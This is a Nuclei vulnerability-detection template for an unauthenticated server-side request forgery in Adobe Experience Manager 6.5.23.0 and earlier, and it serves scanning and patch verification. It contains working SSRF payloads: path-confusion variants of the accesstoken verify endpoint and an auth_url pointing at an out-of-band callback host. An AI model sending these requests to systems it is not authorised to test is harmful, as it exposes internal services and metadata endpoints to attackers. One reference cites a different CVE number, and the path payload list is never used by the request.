id: CVE-2025-54249

info:
  name: Adobe Experience Manager ≤ 6.5.23.0 – SSRF
  author: DhiyaneshDk,assetnote
  severity: medium
  description: |
    Adobe Experience Manager versions 6.5.23.0 and earlier are affected by a Server-Side Request Forgery (SSRF) vulnerability that could result in a Security feature bypass
  impact: |
    Unauthenticated attackers can bypass security feature restrictions and force the server to make requests to arbitrary URLs, potentially enabling access to internal services and metadata endpoints.
  remediation: |
    Upgrade Adobe Experience Manager to a version later than 6.5.23.0 that properly validates redirect URLs and implements SSRF protections.
  reference:
    - https://github.com/assetnote/hopgoblin/blob/main/hopgoblin.py
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54251
    - https://helpx.adobe.com/security/products/experience-manager/apsb25-90.html
  metadata:
    verified: true
    max-request: 6
    vendor: adobe
    product: experience_manager
    fofa-query: body="/libs/granite/core/content/login.html"
  tags: cve,cve2025,adobe,aem,ssrf,oast,oob,vkev,vuln

http:
  - raw:
      - |
        POST /services/accesstoken/verify;x='.pdf/x' HTTP/1.1
        Host: {{Hostname}}
        User-Agent: hopgoblin/1.0
        Accept-Encoding: gzip, deflate, br
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Connection: keep-alive
        Cache-Control: max-age=0
        Sec-Ch-Ua: "Google Chrome";v="139", "Not=A?Brand";v="8", "Chromium";v="139"
        Sec-Ch-Ua-Mobile: ?0
        Sec-Ch-Ua-Platform: "macOS"
        Accept-Language: en-US;q=0.9,en;q=0.8
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Content-Type: application/x-www-form-urlencoded

        auth_url=https%3A%2F%2F{{interactsh-url}}

    payloads:
      path:
        - "/services/accesstoken/verify;x='.pdf/x'"
        - "/services/accesstoken/verify;x='.ico/x'"
        - "/services/accesstoken/verify;x='.html/x'"
        - "/services/accesstoken/verify;x='.css/x'"
        - "/services/accesstoken/verify;x='x/graphql/execute/json/x'"
        - "/graphql/execute.json/..%2F../services/accesstoken/verify"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(body,'<html')"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

    extractors:
      - type: dsl
        dsl:
          - 'interactsh_protocol'
          - 'interactsh_request'
# digest: 4b0a00483046022100f75646a98daab993617823879973039b68b1423affcc2b5c216ba487ee933bd30221008777ac00011c7b08e69648b41990221d1195771e54f979ba3654ccd53f078be0:922c64590222798bb761d5b6d8e72950